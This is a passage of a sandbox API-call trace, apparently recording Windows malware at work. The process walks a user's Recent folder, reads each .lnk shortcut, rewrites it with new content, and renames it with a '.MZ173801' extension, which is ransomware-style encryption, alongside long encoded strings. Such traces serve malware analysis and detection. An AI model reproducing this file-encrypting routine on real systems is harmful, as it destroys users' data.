lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.265] GetCurrentThreadId () returned 0x1358 [0112.265] GetCurrentThreadId () returned 0x1358 [0112.265] GetCurrentThreadId () returned 0x1358 [0112.265] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wk25qq4bwLfkVhGZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wk25qq4bwlfkvhgz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.265] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.265] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.265] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x426 [0112.265] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.265] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x426, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x426, lpOverlapped=0x0) returned 1 [0112.266] CloseHandle (hObject=0x3f4) returned 1 [0112.266] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wk25qq4bwLfkVhGZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wk25qq4bwlfkvhgz.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.267] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x426, lpOverlapped=0x0) returned 1 [0112.268] CloseHandle (hObject=0x3f4) returned 1 [0112.269] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wk25qq4bwLfkVhGZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wk25qq4bwlfkvhgz.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wk25qq4bwLfkVhGZ.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wk25qq4bwlfkvhgz.lnk.mz173801")) returned 1 [0112.269] GetCurrentThreadId () returned 0x1358 [0112.269] GetCurrentThreadId () returned 0x1358 [0112.269] GetCurrentThreadId () returned 0x1358 [0112.269] GetCurrentThreadId () returned 0x1358 [0112.269] GetCurrentThreadId () returned 0x1358 [0112.269] GetCurrentThreadId () returned 0x1358 [0112.269] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1a1cc3, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x6f1a1cc3, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6f1a1cc3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x292, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="WUbrVo Nrjfu.lnk", cAlternateFileName="WUBRVO~1.LNK")) returned 1 [0112.269] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.269] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.269] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WUbrVo Nrjfu.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wubrvo nrjfu.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1a1cc3, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x6f1a1cc3, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6f1a1cc3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x292)) returned 1 [0112.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.270] GetCurrentThreadId () returned 0x1358 [0112.270] GetCurrentThreadId () returned 0x1358 [0112.270] GetCurrentThreadId () returned 0x1358 [0112.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.271] GetCurrentThreadId () returned 0x1358 [0112.271] GetCurrentThreadId () returned 0x1358 [0112.271] GetCurrentThreadId () returned 0x1358 [0112.271] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WUbrVo Nrjfu.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wubrvo nrjfu.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.271] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.271] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.271] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x292 [0112.271] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.271] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x292, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x292, lpOverlapped=0x0) returned 1 [0112.272] CloseHandle (hObject=0x3f4) returned 1 [0112.272] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WUbrVo Nrjfu.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wubrvo nrjfu.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.273] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x292, lpOverlapped=0x0) returned 1 [0112.274] CloseHandle (hObject=0x3f4) returned 1 [0112.275] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WUbrVo Nrjfu.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wubrvo nrjfu.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WUbrVo Nrjfu.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wubrvo nrjfu.lnk.mz173801")) returned 1 [0112.276] GetCurrentThreadId () returned 0x1358 [0112.276] GetCurrentThreadId () returned 0x1358 [0112.276] GetCurrentThreadId () returned 0x1358 [0112.276] GetCurrentThreadId () returned 0x1358 [0112.276] GetCurrentThreadId () returned 0x1358 [0112.276] GetCurrentThreadId () returned 0x1358 [0112.276] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75fe5c49, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75fe5c49, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75fe701f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="x-fqzeifd646TQM_WO.lnk", cAlternateFileName="X-FQZE~1.LNK")) returned 1 [0112.276] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.276] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\x-fqzeifd646TQM_WO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\x-fqzeifd646tqm_wo.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75fe5c49, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75fe5c49, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75fe701f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2b0)) returned 1 [0112.276] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.276] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.277] GetCurrentThreadId () returned 0x1358 [0112.277] GetCurrentThreadId () returned 0x1358 [0112.277] GetCurrentThreadId () returned 0x1358 [0112.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 